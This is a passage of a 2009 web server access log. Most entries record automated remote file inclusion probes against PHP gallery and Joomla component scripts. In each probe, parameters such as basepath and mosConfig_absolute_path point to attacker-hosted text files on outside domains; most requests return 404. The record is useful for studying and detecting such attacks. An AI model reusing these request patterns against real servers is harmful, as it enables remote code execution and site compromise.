78.110.50.134 - - [28/Jun/2009:10:29:44 -0400] "GET /log/sdaglobal.org-access_log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.unreals.co.cc/omilaid.txt?? HTTP/1.1" 404 357
78.110.50.134 - - [28/Jun/2009:10:29:44 -0400] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.unreals.co.cc/omilaid.txt?? HTTP/1.1" 404 328
78.110.50.134 - - [28/Jun/2009:10:29:45 -0400] "GET /log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.unreals.co.cc/omilaid.txt?? HTTP/1.1" 404 332
78.110.50.134 - - [28/Jun/2009:10:29:45 -0400] "GET /log/sdaglobal.org-access_log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.unreals.co.cc/omilaid.txt?? HTTP/1.1" 404 357
78.110.50.134 - - [28/Jun/2009:10:29:46 -0400] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.unreals.co.cc/omilaid.txt?? HTTP/1.1" 404 328
78.110.50.134 - - [28/Jun/2009:10:29:46 -0400] "GET /log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.unreals.co.cc/omilaid.txt?? HTTP/1.1" 404 332
72.30.142.107 - - [28/Jun/2009:10:34:57 -0400] "GET /log/zjjs.sdaglobal.org-error_log.1 HTTP/1.0" 200 32718
217.147.29.190 - - [28/Jun/2009:10:43:06 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 307
217.147.29.190 - - [28/Jun/2009:10:43:07 -0400] "GET /log/sdaglobal.org-access_log.2//include/admin.lib.inc.php?site_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 338
217.147.29.190 - - [28/Jun/2009:10:43:07 -0400] "GET /log//include/admin.lib.inc.php?site_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 311
66.249.68.226 - - [28/Jun/2009:10:43:54 -0400] "GET /robots.txt HTTP/1.1" 404 291
66.249.68.226 - - [28/Jun/2009:10:44:01 -0400] "GET /log/chemistry.hitechemall.com-access_log.3 HTTP/1.1" 200 19539
217.147.29.190 - - [28/Jun/2009:10:52:14 -0400] "GET //includes/ktedit/toolbar.php?dirDepth=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 309
217.147.29.190 - - [28/Jun/2009:10:52:15 -0400] "GET /log//includes/ktedit/toolbar.php?dirDepth=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 313
217.147.29.190 - - [28/Jun/2009:10:52:15 -0400] "GET /log/sdaglobal.org-access_log.2%20%20//includes/ktedit/toolbar.php?dirDepth=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 342
65.55.106.145 - - [28/Jun/2009:10:52:16 -0400] "GET /robots.txt HTTP/1.1" 404 291
217.147.29.190 - - [28/Jun/2009:10:52:46 -0400] "GET /log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 323
217.147.29.190 - - [28/Jun/2009:10:52:46 -0400] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 319
217.147.29.190 - - [28/Jun/2009:10:53:00 -0400] "GET /log/sdaglobal.org-access_log.2%20%20//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 352
217.147.29.190 - - [28/Jun/2009:10:54:22 -0400] "GET /log/sdaglobal.org-access_log.2%20%20//include/admin.lib.inc.php?site_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 340
216.17.99.13 - - [28/Jun/2009:10:56:08 -0400] "GET /log/sdaglobal.org-error_log.1%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 355
216.17.99.13 - - [28/Jun/2009:10:56:08 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 324
216.17.99.13 - - [28/Jun/2009:10:56:08 -0400] "GET /log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 328
216.17.99.13 - - [28/Jun/2009:10:56:08 -0400] "GET /log/sdaglobal.org-error_log.2%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 355
216.17.99.13 - - [28/Jun/2009:11:00:16 -0400] "GET /log/sdaglobal.org-error_log.1/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 354
216.17.99.13 - - [28/Jun/2009:11:00:28 -0400] "GET /log/sdaglobal.org-error_log.2/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 354
220.141.124.124 - - [28/Jun/2009:11:01:55 -0400] "GET /images/gd.gif HTTP/1.1" 304 -
65.55.106.145 - - [28/Jun/2009:11:02:08 -0400] "GET /log/auccf.sdaglobal.org-error_log HTTP/1.1" 200 447
217.147.29.190 - - [28/Jun/2009:11:04:27 -0400] "GET /log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 295
217.147.29.190 - - [28/Jun/2009:11:04:27 -0400] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 291
217.147.29.190 - - [28/Jun/2009:11:04:30 -0400] "GET /log/sdaglobal.org-access_log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 320
211.206.120.187 - - [28/Jun/2009:11:05:10 -0400] "GET /log/sdag